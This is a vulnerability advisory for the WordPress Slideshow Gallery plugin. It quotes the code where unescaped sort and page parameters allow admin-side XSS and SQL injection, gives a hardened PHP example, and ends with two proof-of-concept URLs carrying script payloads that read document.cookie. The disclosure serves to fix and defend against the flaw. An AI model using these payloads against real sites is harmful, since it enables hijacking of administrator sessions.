$_GET['order'] is not escaped.
File: slideshow-gallery\views\admin\galleries\index.php
$orderby = (empty($_GET['orderby'])) ? 'modified' : $_GET['orderby'];
$order = (empty($_GET['order'])) ? 'desc' : strtolower($_GET['order']);
<th class="column-id <?php echo ($orderby == "id") ? 'sorted ' . $order : 'sortable desc'; ?>">
<th class="column-title <?php echo ($orderby == "title") ? 'sorted ' . $order : 'sortable desc'; ?>">
<th class="column-modified <?php echo ($orderby == "modified") ? 'sorted ' . $order : 'sortable desc'; ?>">
This value can also be used for SQL injection:
File: slideshow-gallery\vendors\class.paginate.php
list($osortby, $osort) = $this -> order;
$query .= " ORDER BY `" . $osortby . "` " . $osort . " LIMIT " . $this -> begRecord . " , " . $this -> per_page . ";";
In the Pro version, if you have more than 10 galleries, $_GET['Gallerypage'] is not escaped.
File: slideshow-gallery\vendors\class.paginate.php
$this -> pagination .= '<input class="slideshow-paged-input current-page" type="text" name="paged" id="paged-input" value="' . $this -> page . '" size="1"> ';
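A hardened version of the parameter handling quoted above, added here as an example and not taken from the plugin or from its 1.6.1 fix: sort column and direction are checked against an allow-list before they reach either the HTML attribute or the ORDER BY clause, and the page number is forced to an integer. It assumes the WordPress helpers esc_attr() and absint() (plain-PHP fallbacks are included so it runs outside WordPress); the function names are hypothetical.

```php
<?php
// Added example (not the plugin's code or its 1.6.1 fix): hardened handling of the
// parameters quoted above. Function names are hypothetical.
if (!function_exists('esc_attr')) {            // fallback when run outside WordPress
    function esc_attr($text) { return htmlspecialchars((string) $text, ENT_QUOTES, 'UTF-8'); }
}
if (!function_exists('absint')) {
    function absint($value) { return abs((int) $value); }
}

// Only real, known column names may be sorted on; anything else falls back to
// the plugin's default "modified". Direction is restricted to asc/desc.
function gallery_sort_params(array $get) {
    $allowed = array('id', 'title', 'modified');
    $orderby = isset($get['orderby']) ? (string) $get['orderby'] : 'modified';
    if (!in_array($orderby, $allowed, true)) {
        $orderby = 'modified';
    }
    $order = isset($get['order']) ? strtolower((string) $get['order']) : 'desc';
    if ($order !== 'asc' && $order !== 'desc') {
        $order = 'desc';   // any other value (the PoC payload included) is discarded
    }
    return array($orderby, $order);
}

// Pro pagination: the page number must be a positive integer, nothing else.
function gallery_page_param(array $get) {
    return max(1, isset($get['Gallerypage']) ? absint($get['Gallerypage']) : 1);
}

// The ORDER BY fragment is assembled only from the validated values, so no
// request text can reach the SQL string (compare class.paginate.php above).
function gallery_order_clause(array $get) {
    list($orderby, $order) = gallery_sort_params($get);
    return " ORDER BY `" . $orderby . "` " . strtoupper($order);
}

// Header cell class: built from validated values and still escaped on output.
function gallery_header_class($column, array $get) {
    list($orderby, $order) = gallery_sort_params($get);
    $state = ($orderby === $column) ? 'sorted ' . $order : 'sortable desc';
    return esc_attr('column-' . $column . ' ' . $state);
}
?>
<th class="<?php echo gallery_header_class('title', $_GET); ?>">
<input class="slideshow-paged-input current-page" type="text" name="paged"
       id="paged-input" value="<?php echo esc_attr(gallery_page_param($_GET)); ?>" size="1">
```

With the allow-list in place, the two proof-of-concept URLs below render the default sort and page 1 instead of executing script, and the same validated values feed the SQL query.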
Proof of Concept
The XSS is visible to the administrator (both affected pages are in the admin area).
http://wp/wp-admin/admin.php?page=slideshow-galleries&orderby=modified&order=asc-- \"><script>alert(document.cookie);</script>
If you have the PRO version and more than 10 galleries:
http://wp/wp-admin/admin.php?page=slideshow-galleries&Gallerypage=\"><script>alert(document.cookie);</script>
Timeline
- 02-12-2015: Discovered
- 02-12-2015: Vendor notified
- 23-04-2015: Version 1.6.1 released, issue resolved